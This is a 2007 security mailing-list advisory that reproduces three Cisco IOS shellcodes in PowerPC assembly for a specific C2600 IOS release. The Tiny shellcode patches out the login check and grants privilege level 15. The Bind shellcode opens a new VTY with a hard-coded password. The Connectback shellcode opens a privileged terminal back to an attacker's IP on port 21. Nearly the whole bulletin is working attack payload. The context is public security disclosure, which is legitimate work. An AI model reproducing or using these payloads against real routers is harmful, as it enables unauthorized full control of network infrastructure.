[EXPL] Multiple Cisco IOS Shellcodes



The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



Multiple Cisco IOS Shellcodes
------------------------------------------------------------------------


SUMMARY

Several Cisco IOS shellcodes have been released, these shellcodes allow an
attacker to gain elevated privileges on the Cisco device if it can cause
the device to execute any of the below attached shellcodes.

DETAILS

Cisco IOS Tiny shellcode
# -----------------------------------------------
#
# Cisco IOS Tiny shellcode v1.0 -
http://www.irmplc.com/downloads/presentations/IOS_tiny_v.1.0.txt
# (c) 2007 IRM Plc
# By Gyan Chawdhary
#
# -----------------------------------------------
#
# The code creates a new TTY, and sets the privilege level to 15 without a
password
#
# This shellcode can be used as the payload for any IOS exploit on a
PowerPC-based device.
#
#
# The following two hard-coded addresses must be located for the target
IOS version.
#
# The hard-coded addresses used here are for:
#
# IOS (tm) C2600 Software (C2600-IK9S-M), Version 12.3(22), RELEASE
SOFTWARE (fc2)
#
# -----------------------------------------------
equ ret, 0x804a42e8
equ login, 0x8359b1f4
equ god, 0xff100000
equ priv, 0x8359be64
# -----------------------------------------------

main:

# login patch begin
lis 9, login@ha
la 9, login@l(9)
li 8,0
stw 8, 0(9)
# login patch end

# priv patch begin
lis 9, priv@ha
la 9, priv@l(9)
lis 8, god@ha
la 8, god@l(8)
stw 8, 0(9)
# priv patch end

# exit code
lis 10, ret@ha
addi 4, 10, ret@l
mtctr 4
bctrl

Cisco IOS Bind shellcode
# -----------------------------------------------
#
# Cisco IOS Bind shellcode v1.0 -
http://www.irmplc.com/downloads/presentations/IOS_Bindshell_v.1.0.txt
# (c) 2007 IRM Plc
# By Varun Uppal
#
# -----------------------------------------------
#
# The code creates a new VTY, allocates a password then sets the privilege
level to 15
#
# This shellcode can be used as the payload for any IOS exploit on a
PowerPC-based device.
# Once assembled, the payload is only 116 bytes in length
#
# The following four hard-coded addresses must be located for the target
IOS version.
# Version 1.1 of the shellcode will auto-locate these values and make the
code
# IOS-version-independent
#
# The hard-coded addresses used here are for:
#
# IOS (tm) C2600 Software (C2600-IK9S-M), Version 12.3(22), RELEASE
SOFTWARE (fc2)
#
# -----------------------------------------------
equ makenewvty, 0x803d0d08
equ malloc, 0x804785cc
equ setpwonline, 0x803b9e90
equ linesstruct, 0x82f9e334
# -----------------------------------------------

equ priv, 0xf1000000 #value used to set the privilege level

main: li 3,71 #new vty line = 71
lis 9,makenewvty@ha
la 9,makenewvty@l(9)
mtctr 9
bctrl #makenewvty()

li 3,0x1e5c
lis 9,malloc@ha
la 9,malloc@l(9)
mtctr 9
bctrl #malloc() memory for structure

li 4,70
stw 4,0xa68(3)
li 5,72
stw 5,0xa6c(3)
li 4,0x00
bl setp #pointer to the password into LR

string "1rmp455" #the password for the line

setp: mflr 5
lis 9,setpwonline@ha
la 9,setpwonline@l(9)
mtctr 9
bctrl #setpwonline()

lis 8,linesstruct@ha
la 8,linesstruct@l(8)
lwz 9,0(8)
lis 7,priv@ha
la 7,priv@l(7)
stw 7,0xde4(9) #set privilege level to 15

Cisco IOS Connectback shellcode
# -----------------------------------------------
#
# Cisco IOS Connectback shellcode v1.0 -
http://www.irmplc.com/downloads/presentations/IOS_Connectback_v.1.0.txt
# (c) 2007 IRM Plc
# By Gyan Chawdhary
#
# -----------------------------------------------
#
# The code creates a new TTY, allocates a shell with privilege level 15
and connects back
# on port 21
#
# This shellcode can be used as the payload for any IOS exploit on a
PowerPC-based device.
#
#
# The following five hard-coded addresses must be located for the target
IOS version.
#
# The hard-coded addresses used here are for:
#
# IOS (tm) C2600 Software (C2600-IK9S-M), Version 12.3(22), RELEASE
SOFTWARE (fc2)
#
# -----------------------------------------------
equ malloc, 0x804785CC
equ allocate_tty, 0x803d155c
equ ret, 0x804a42e8
equ addr, 0x803c4ad8
equ str, 0x81e270b4
equ tcp_connect, 0x80567568
equ tcp_execute_command, 0x8056c354
equ login, 0x8359b1f4
equ god, 0xff100000
equ priv, 0x8359be64
# -----------------------------------------------

main:
stwu 1,-48(1)
mflr 0
stw 31,44(1)
stw 0,52(1)
mr 31,1
li 3,512
lis 9,malloc@ha #malloc() memory for tcp structure
la 9,malloc@l(9)
mtctr 9
bctrl
mr 0,3
stw 0,20(31)
lwz 9,12(31)
li 0,1
stb 0,0(9)
lwz 9,12(31)
lis 0,0xac1e # connect back ip address
ori 0,0,1018 #
stw 0,4(9)
li 3,66
li 4,0
lis 9,allocate_tty@ha # allocate new TTY
la 9,allocate_tty@l(9)
mtctr 9
bctrl
addi 0,31,24

# Fix TTY structure to enable level 15 shell without password
#
#
##########################################################

# login patch begin
lis 9, login@ha
la 9, login@l(9)
li 8,0
stw 8, 0(9)
# login patch end

#IDA placeholder for con0
#
# lis %r9, ((stdio+0x10000)@h)
# lwz %r9, stdio@l(%r9)
# lwz %r0, 0xDE4(%r9) #priv struct
#
# priv patch begin
lis 9, priv@ha
la 9, priv@l(9)
lis 8, god@ha
la 8, god@l(8)
stw 8, 0(9)
# priv patch end

###########################################################

li 3,0
li 4,21 # Port 21 for connectback
lwz 5,12(31)
li 6,0
li 7,0
mr 8,0
li 9,0
lis 11,tcp_connect@ha # Connect to attacker IP
la 11,tcp_connect@l(11)
mtctr 11
bctrl
mr 0,3
stw 0,20(31)
li 3,66
lwz 4,20(31)
li 5,0
li 6,0
li 7,0
li 8,0
li 9,0
li 10,0
lis 11,tcp_execute_command@ha # Execute Virtual Terminal on outgoing
connection, similar to /bin/bash
la 11,tcp_execute_command@l(11)
mtctr 11
bctrl
lwz 11,0(1)
lwz 0,4(11)
mtlr 0
lwz 31,-4(11)
mr 1,11

###########################################
lis 9, addr@ha
addi 0, 9, addr@l
mtctr 0
xor 3,3,3
addi 3,0, -2
lis 10, str@ha
addi 4, 10, str@l
bctrl
lis 10, ret@ha
addi 4, 10, ret@l
mtctr 4
bctrl


ADDITIONAL INFORMATION

The information has been provided by <mailto:gyan.chawdhary@xxxxxxxxxx>
Gyan Chawdhary.



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.